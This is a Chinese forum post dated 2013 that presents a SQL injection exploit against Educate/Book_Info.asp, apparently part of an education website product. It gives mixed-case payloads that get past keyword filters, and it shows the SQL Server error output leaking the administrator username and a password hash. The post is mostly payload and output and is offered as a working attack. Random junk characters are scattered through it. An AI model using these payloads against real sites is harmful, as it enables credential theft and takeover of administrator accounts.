漏洞出现在Educate/Book_Info.asp $ M' a9 X" @' l7 p
) j% S6 m# e1 p/ M此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出: p! P* \/ U) R$ z( P
' ~ p7 V, x2 z3 T( r& @- V; h0 v
exp:如下- { m7 Z& _1 v- V$ _: X
查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)
+ z/ C9 f( I# A- o! k& D5 A查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
% R) u, \% ?( v$ M8 x; z! K
$ W! W7 p! Q; E' |8 y! {8 b5 Qhttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)& [, o7 X1 F+ ]
( H7 E1 s2 Q% H0 y1 `6 I5 yMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
" G& g( @8 z3 ]# @
j8 c7 n$ i5 V' ^; C; x将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。% k) D' z+ L4 |/ R& |5 b5 k
" s7 L4 B' M6 v/ F/ d
/Educate/Book_Info.asp,行 83 T# l% R7 j7 v0 \
8 r+ C7 r, w$ ?$ T8 X$ [7 ihttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
, k9 h) u9 \8 L: F4 o- W% k& i/ v ) B! p4 W8 U! r0 `3 w
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'- M) J J4 T1 t) o) P+ h3 B4 i
! _0 i. e5 a' d/ H: h ~; B) N9 d% v将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
' o" U* ]1 M% N" t- `5 E6 I 6 N/ r+ h" f9 j
/Educate/Book_Info.asp,行 8
2 r0 ~0 p9 ?* A; | |
发表于 2013-2-16 21:44:16
收藏
支持
反对